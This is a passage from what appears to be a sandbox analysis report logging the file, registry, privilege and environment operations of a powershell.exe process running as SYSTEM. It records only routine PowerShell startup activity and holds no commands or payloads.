| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
7 | |
| Get Info | C:\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
11 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
2 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 62 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 17 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 57 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 25 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 54 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
2 |
Registry (194)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
User (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Get Username | user_name_out = SYSTEM |
|
10 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (125)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
116 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE |
|
1 | |
| Get Environment String | name = HOMEPATH |
|
1 | |
| Get Environment String | name = HomeDrive |
|
1 | |
